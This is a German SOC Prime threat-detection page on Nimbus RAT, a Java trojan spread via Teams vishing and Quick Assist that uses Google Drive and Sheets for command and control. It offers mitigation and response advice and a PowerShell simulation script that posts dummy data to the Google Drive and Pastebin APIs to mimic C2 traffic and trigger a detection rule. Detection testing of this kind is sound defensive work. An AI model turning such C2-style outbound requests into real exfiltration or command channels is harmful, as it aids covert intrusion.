SOC Prime Bias: Mittel

05 Jun 2026 15:31 UTC

Nimbus RAT wird über Microsoft Teams und Google Drive verbreitet

Author Photo
SOC Prime Team linkedin icon Folgen
Nimbus RAT wird über Microsoft Teams und Google Drive verbreitet
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Bedrohungsakteure nutzten Microsoft Teams Voice Phishing zusammen mit Quick Assist, um einen Java-basierten Remote-Access-Trojaner namens Nimbus RAT bereitzustellen. Die Malware verwendet Google Drive und Google Sheets als seine Command-and-Control-Kanäle und beinhaltet eine eigene gebündelte OpenJDK-Runtime. Für den Diebstahl von Anmeldedaten verwendet sie entweder eine gefälschte Windows-Sicherheitsaufforderung oder die native CredUI-API, um Benutzergeheimnisse zu erfassen.

Untersuchung

Die Threat Response Unit von eSentire rekonstruierte die vollständige Eindringkette unter Verwendung von Mail-Flow-Protokollen, Endpunkt-Telemetrie und statischer Analyse der Java-Malware. Die Kampagne kombinierte E-Mail-Bombardierung, einen vishing-Anruf über Teams, Quick Assist Remote-Unterstützung, ein bei Pastebin gehostetes Anleitungsblatt und einen kompromittierten SharePoint-Mandanten zur Verteilung der Nutzlast.

Minderung

Empfohlene Abwehrmaßnahmen umfassen die Deaktivierung externer Teams-Nachrichten von unbekannten Mandanten, das Blockieren von Quick Assist, wo es nicht erforderlich ist, das Alarmieren bei Spitzen in der E-Mail-Bombardierung und das Überwachen javaw.exe Ausführung von ungewöhnlichen Standorten sowie das Erkennen verdächtiger Google Drive API-Aufrufe, die von unerwarteten Prozessen initiiert werden.

Antwort

Wenn Nimbus RAT-Aktivitäten erkannt werden, isolieren Sie das betroffene System, beenden Sie alle zugehörigen javaw.exe Prozesse, entfernen Sie das C:ProgramDataInboxCorePro Verzeichnis und alle zugehörigen Autostart-Verknüpfungen und ziehen Sie eine vollständige System-Neuabbildung in Betracht. Überprüfen Sie auch die Google Workspace-Auditprotokolle, um unbefugte Google Drive-Anwendungsgenehmigungen zu identifizieren.

Angriffsfluss

Simulation-Ausführung

Voraussetzung: Die Telemetrie- & Baseline-Vorab-Check muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der gegnerischen Technik (TTP), die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und Erzählung müssen direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die erwartete Telemetrie zu generieren, die durch die Erkennungslogik erwartet wird.

  • Angriffs-Narrativ & Befehle:
    Der Bedrohungsakteur hat das Endgerät bereits mit der Nimbus RAT-Binärdatei kompromittiert. Um einen verdeckten C2-Kanal zu etablieren, sendet die RAT zwei ausgehende HTTP POST-Anfragen:

    1. Google Drive API-Aufruf – lädt eine kleine JSON-Nutzlast hoch zu https://www.googleapis.com/drive/v3/files?uploadType=media, ahmt das „download‑payload“-Verhalten der RAT nach.
    2. Pastebin Paste – postet eine base‑64‑kodierte Befehlszeichenfolge an https://pastebin.com/api/api_post.php unter Verwendung des öffentlichen API-Schlüssels.

    Beide Anfragen werden über PowerShell’s Invoke-WebRequest ausgeführt, um sicherzustellen, dass die Firewall-Protokolle das Domain Feld enthalten (googleapis.com and pastebin.com). Der Angreifer führt die Befehle im Kontext des kompromittierten Benutzers aus, um sich mit normaler Aktivität zu vermischen.

  • Regressionstest-Skript:

    # --------------------------------------------------------------
    # Nimbus RAT C2 Simulation – löst Sigma-Regel bei Domänenübereinstimmung aus
    # --------------------------------------------------------------
    
    # 1. Google Drive API-Schein-Upload (keine Authentifizierung – Fokus auf Domänentelemetrie)
    $googlePayload = @{ name = "dummy.txt"; mimeType = "text/plain" } | ConvertTo-Json
    $googleUri = "https://www.googleapis.com/drive/v3/files?uploadType=media"
    
    try {
        Invoke-WebRequest -Uri $googleUri -Method POST -Body $googlePayload `
            -ContentType "application/json" -UseBasicParsing -ErrorAction Stop
        Write-Host "[+] Schein-Upload an Google Drive API gesendet"
    } catch {
        Write-Warning "Google Drive-Anfrage fehlgeschlagen (in Sandbox erwartet): $_"
    }
    
    # 2. Pastebin öffentliche API-Post (erfordert einen Entwicklerschlüssel – mit einem Platzhalter)
    $pastebinKey   = "YOUR_PUBLIC_API_KEY"    # <-- für echten Test mit gültigem Schlüssel ersetzen
    $pastebinText  = "echo 'Simulierter Befehl von C2'" 
    $pastebinUri   = "https://pastebin.com/api/api_post.php"
    $pastebinBody  = @{
        api_dev_key = $pastebinKey
        api_option  = "paste"
        api_paste_code = $pastebinText
        api_paste_private = "1"
    }
    
    try {
        Invoke-WebRequest -Uri $pastebinUri -Method POST -Body $pastebinBody `
            -ContentType "application/x-www-form-urlencoded" -UseBasicParsing -ErrorAction Stop
        Write-Host "[+] Schein-Befehl an Pastebin gepostet"
    } catch {
        Write-Warning "Pastebin-Anfrage fehlgeschlagen (in Sandbox erwartet): $_"
    }
    
    # --------------------------------------------------------------
    # Ende der Simulation
    # --------------------------------------------------------------
  • Aufräumbefehle:

    # Entfernen Sie alle temporären Dateien oder Variablen, die während der Simulation verwendet wurden
    Remove-Variable -Name googlePayload, googleUri, pastebinKey, pastebinText, pastebinUri, pastebinBody -ErrorAction SilentlyContinue
    Write-Host "[*] Bereinigung abgeschlossen."